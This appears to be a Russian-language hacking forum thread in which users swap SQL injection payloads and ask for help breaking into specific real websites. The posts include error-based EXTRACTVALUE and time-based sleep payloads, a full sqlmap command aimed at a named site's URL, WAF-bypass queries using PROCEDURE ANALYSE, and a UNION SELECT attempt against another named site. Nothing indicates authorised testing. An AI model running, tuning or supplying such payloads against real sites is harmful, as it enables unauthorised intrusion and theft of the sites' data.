PHP: id=1+AND+EXTRACTVALUE(22,CONCAT(0x5c,(select+table_name+from+information_schema.tables+where+table_schema!='information_schema'+limit+0,1)))--+1 XPATH-Error-Based-Injection-Extractvalue
самый очевидный +and+if(substring(@@version,1,1)=5,sleep(2224),null) С выводом нету вектора, возможно в дальнейшем будет.
судя по постам в разных темах, то для тебя только один вариант, написать на бумажке аккаунт и встав на колени перед ним молить великого Бога контакта и всея соцсети что бы он открылся
хз, на счёт sqli, и не помню чтоб такое дисклоузили, а вот xxe там пофиксили 2 месяца назад... опять же это то, что из открытого
похоже на WAF попробуй --current-user бывает такое что базу не достает, но пользователя бд читает. еще вариант искать другу скулю на сайте, возможно где будет UNION или error based.
нмап не может раскрутить скулу Spoiler: 2 sqlmap -u http://wellaprof.elle.ru/competition?order_by=date&offset=9 --dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user Остальные скрипты тоже. Ручками так выходит ошибка: Incorrect usage of UNION and ORDER BY Проблема в фильтрации или на самом деле скули там нет?
И почему не работает запрос, он же верный по своей структуре? Spoiler: 1 http://wellaprof.elle.ru/competitio...(),concat(0x3a,CONCAT(AES_DECRYPT(AES_ENCRYPT(TABLE_NAME,0x71),0x71))))%2c1)+FROM+INFORMATION_SCHEMA.TABLES%20--%202
ссылается на неверный запрос: Вроде не waf, а я как-то неправильно составил запрос. Допускается кстати и так но ошибка идиентичная Code: http://wellaprof.elle.ru/competition?order_by=date&offset=1%20procedure%20analyse(extractvalue(rand()%2cconcat(0x3a%2cCONCAT(TABLE_NAME)))%2c1)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61--%201 Нашел интересную книгу https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/PT-devteev-CC-WAF.pdf Попытался сделать по ней но тот же результат: http://wellaprof.elle.ru/competition?order_by=date&offset=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(TABLE_NAME))),1)+ascii(lower(mid((from+information_schema.tables),1,1)))-- 1 По ней составил запрос для обхода WAF Выводит значение XPATH syntax error: ':108' А такое же значение как и (0x3a%2cCONCAT(TABLE_NAME) Но понять не могу что фильтрует и как это обойти, чтобы вывести данные.
Помогите пожалуйста, никак не могу сделать это Code: http://www.alphaonenow.org/story.php?news_id=2 UnIoN select 1,2,3+--+- Никак не могу получить вывод.